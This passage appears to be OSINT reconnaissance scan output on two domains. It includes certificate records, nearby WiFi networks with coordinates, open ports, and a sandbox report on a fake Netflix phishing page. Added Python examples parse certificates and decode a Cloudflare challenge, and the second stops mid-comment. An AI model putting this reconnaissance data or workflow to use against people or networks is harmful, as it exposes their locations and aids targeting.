59:ef:54:a6:fe:8f:f7:3b:d0:54:03:d1:5b:32:86:ec:46:0e:
b4:71:65:41
| battleb0t.xyz |
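The two Certificate Transparency rows above (kekw.battleb0t.xyz and nwapi.battleb0t.xyz) both carry the critical "CT Precertificate Poison" extension, so they are precertificates as submitted to the log, not necessarily what the servers ever served, and the nwapi one had expired almost three months before the scan. Added example, not part of the scan output: a Python parser for the `openssl x509 -text` layout used in those cells that extracts the triage fields and judges each certificate against the scan time. The excerpts are copied from the rows above with key material and signatures dropped; treating the table's "Date Found" timestamps as UTC is an assumption (the HTTP `date` headers recorded elsewhere in the table agree with it).

```python
"""Parse `openssl x509 -text` style certificate dumps (the format used in the
Certificate Transparency rows of the scan table) and assess each one relative
to the scan date. Added example, not part of the scan output."""
import re
from datetime import datetime, timedelta, timezone

# Assumption: the table's "Date Found" timestamps are UTC (scan row of the
# nwapi.battleb0t.xyz certificate: 2023-05-12 02:57:09).
SCAN_TIME = datetime(2023, 5, 12, 2, 57, 9, tzinfo=timezone.utc)

# Excerpts copied from the scan table; modulus and signature bytes omitted.
CERT_KEKW = """\
Certificate:
    Data:
        Serial Number:
            03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Mar 27 13:22:33 2023 GMT
            Not After : Jun 25 13:22:32 2023 GMT
        Subject: CN=kekw.battleb0t.xyz
                RSA Public-Key: (4096 bit)
            X509v3 Subject Alternative Name:
                DNS:kekw.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

CERT_NWAPI = """\
Certificate:
    Data:
        Serial Number:
            04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Nov 17 17:26:22 2022 GMT
            Not After : Feb 15 17:26:21 2023 GMT
        Subject: CN=nwapi.battleb0t.xyz
                RSA Public-Key: (4096 bit)
            X509v3 Subject Alternative Name:
                DNS:nwapi.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

_OPENSSL_TIME = "%b %d %H:%M:%S %Y GMT"


def _field(pattern, text):
    """First capture group of `pattern` in `text`, stripped; error if absent."""
    m = re.search(pattern, text)
    if not m:
        raise ValueError(f"field not found: {pattern}")
    return m.group(1).strip()


def _openssl_time(s):
    return datetime.strptime(s, _OPENSSL_TIME).replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Pull the fields that matter for triage out of an openssl text dump."""
    san = _field(r"Subject Alternative Name:\s+(.+)", text)
    return {
        "serial": _field(r"Serial Number:\s+([0-9a-f:]+)", text),
        "issuer": _field(r"Issuer: (.+)", text),
        "subject_cn": _field(r"Subject: .*?CN=([^,\n]+)", text),
        "names": [n.split(":", 1)[1] for n in san.split(", ") if n.startswith("DNS:")],
        "not_before": _openssl_time(_field(r"Not Before: (.+)", text)),
        "not_after": _openssl_time(_field(r"Not After : (.+)", text)),
        "key_bits": int(_field(r"RSA Public-Key: \((\d+) bit\)", text)),
        # The poison extension marks a CT precertificate: what the log holds,
        # not necessarily what the server ever presented to clients.
        "is_precert": "CT Precertificate Poison" in text,
    }


def assess(text, when=SCAN_TIME):
    """Classify a certificate's validity window relative to `when`."""
    c = parse_cert_text(text)
    if when < c["not_before"]:
        c["status"] = "not yet valid"
    elif when > c["not_after"]:
        c["status"] = "expired"
    else:
        c["status"] = "valid"
    c["days_to_expiry"] = (c["not_after"] - when) / timedelta(days=1)
    return c


if __name__ == "__main__":
    for cert in (CERT_KEKW, CERT_NWAPI):
        r = assess(cert)
        print(f"{r['subject_cn']:22} {r['status']:14} {r['days_to_expiry']:+7.1f} d"
              f"  precert={r['is_precert']}  rsa{r['key_bits']}")
```

Run against the two excerpts, the kekw certificate is valid with about 44 days left and the nwapi one expired about 85 days before the scan. An expired CT entry for a hostname is not a finding by itself: it only says the name existed and was issued for in the past, so it should be cross-checked against live DNS and a live TLS connection before being reported.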
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-A822 (Net ID: 00:1D:D4:64:A8:20) | 32.8608, -79.9746 |
| 2023-05-12 02:46:04 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 34.74.170.74 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | name@example.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://hassan-gamall.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6760:304:WilStaging_02"\n "SM0:6760:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6760:304:WilStaging_02"\n "Local\\SM0:6760:120:WilError_01"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httpshassan-gamall.github.ionetflix")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user 
data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006768]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006768]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006768]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006768]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006768]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006768]\n "Tabs_13327998438932197" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13327998438932197]- [targetUID: 00000000-00006768]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006768]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "5d847ab1-2881-4324-a2c6-29fe1a950926.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\5d847ab1-2881-4324-a2c6-29fe1a950926.tmp]- [targetUID: 00000000-00006768]\n "88a6edb1-7ca5-423a-948d-baf040324d05.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\88a6edb1-7ca5-423a-948d-baf040324d05.tmp]- [targetUID: 00000000-00006768]\n "a969316a-dad8-4b0d-bf02-210809eb9653.tmp" has type "UTF-8 Unicode text with very long lines with no line 
terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\a969316a-dad8-4b0d-bf02-210809eb9653.tmp]- [targetUID: 00000000-00006768]\n "6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6086c4de-4b79-4b17-a9f3-0d813216df1c.tmp]- [targetUID: 00000000-00006768]\n "be503e2a-334b-416d-8133-7309c5f020e8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\be503e2a-334b-416d-8133-7309c5f020e8.tmp]- [targetUID: 00000000-00006768]\n "3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\3da34e63-27c2-46cb-9277-75fa8ed92f1a.tmp]- [targetUID: 00000000-00006768]\n "ba18673a-06ca-42f2-836f-2b95dafc094e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ba18673a-06ca-42f2-836f-2b95dafc094e.tmp]- [targetUID: 00000000-00006768]\n "8a917af9-8d36-4842-b176-78503ca8e5cb.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8a917af9-8d36-4842-b176-78503ca8e5cb.tmp]- [targetUID: 00000000-00006768]\n "Network Action Predictor" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor]- [targetUID: 00000000-00006768]\n "Cookies" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies]- [targetUID: 00000000-00005860]\n "Network Action Predictor-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network Action Predictor-journal]- 
[targetUID: 00000000-00006768]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\000003.log]- [targetUID: 00000000-00006768]\n "222527e1-3f73-4acc-a332-f69002db3178.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\222527e1-3f73-4acc-a332-f69002db3178.tmp]- [targetUID: 00000000-00006768]\n "f838898f-efdb-43ba-a200-ee2debfcb004.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f838898f-efdb-43ba-a200-ee2debfcb004.tmp]- [targetUID: 00000000-00006768]\n "9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9fa1a642-dc59-4b5c-b3dc-8b2fdacab608.tmp]- [targetUID: 00000000-00006768]\n "7f4cd2f4-322e-419e-b872-153c4df2b660.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7f4cd2f4-322e-419e-b872-153c4df2b660.tmp]- [targetUID: 00000000-00006768]\n "4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4add7271-5d67-4bc9-8ac7-d5d5845e9be7.tmp]- [targetUID: 00000000-00006768]\n "Cookies-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies-journal]- [targetUID: 00000000-00005860]\n "History-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00006768]\n "urlref_httpshassan-gamall.github.ionetflix" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "000003.log" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00006768]\n "000004.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Session Storage\\000004.log]- [targetUID: 00000000-00006768]\n "0a0f3415-fbdd-4dcb-895f-bbcb036930f4.tmp" has type "ASCII text with very long lines with no line terminators"- L |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 135.97.148.34.bc.googleusercontent.com | 34.148.97.135 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | arpej (Net ID: 00:1A:2A:02:1A:E6) | 40.2024, 29.0398 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 5 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6
a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.214): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:80 | 188.114.97.1 |
| 2023-05-12 03:32:02 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.2:8080 | 188.114.97.0/24 |
| 2023-05-12 03:36:42 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Medellin, Colombia | 188.114.96.1 |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
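The Internet Name row for www.ayhu.xyz above did not capture the site: it captured Cloudflare's managed challenge page (title "Just a moment..."), and the HTTP Headers row directly above says so explicitly with `cf-mitigated: challenge`. Added example, not part of the scan output: decoding the base64 request context that the challenge page embeds in `window._cf_chl_opt.cRq`, which recovers what the scanner sent and when. The HTML excerpt is copied from that row; the meaning of the `ru`, `ra`, `rm` and `t` keys is inferred from their decoded values and is not documented by Cloudflare.

```python
"""Decode the request context a Cloudflare managed-challenge page embeds in
`window._cf_chl_opt.cRq`, so a captured challenge page can be read as evidence
of what was challenged instead of being mistaken for site content.
Added example, not part of the scan output."""
import base64
import re
from datetime import datetime, timezone

# Excerpt copied from the captured www.ayhu.xyz challenge page in the table.
CHALLENGE_HTML = """\
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST">
</form>
<script>
window._cf_chl_opt={
    cZone: 'www.ayhu.xyz',
    cType: 'managed',
    cRay: '7c5f6071cb5443bc',
    cRq: {
        ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
        ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
        rm: 'R0VU',
        t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
    }
};
</script>
"""


def _b64(s):
    """Decode base64, tolerating values emitted without padding."""
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("utf-8")


def _opt(name, html):
    """Value of a single-quoted `name: '...'` entry in the _cf_chl_opt literal."""
    m = re.search(rf"\b{re.escape(name)}:\s*'([^']*)'", html)
    if not m:
        raise ValueError(f"{name} not present in challenge page")
    return m.group(1)


def decode_challenge(html):
    """Return the scanner-visible facts about a captured challenge page.
    Key meanings (ru = URL, ra = User-Agent, rm = method, t = epoch seconds)
    are an assumption inferred from the decoded values."""
    ts = float(_b64(_opt("t", html)))
    # The form token embeds the same epoch second between dashes; checking that
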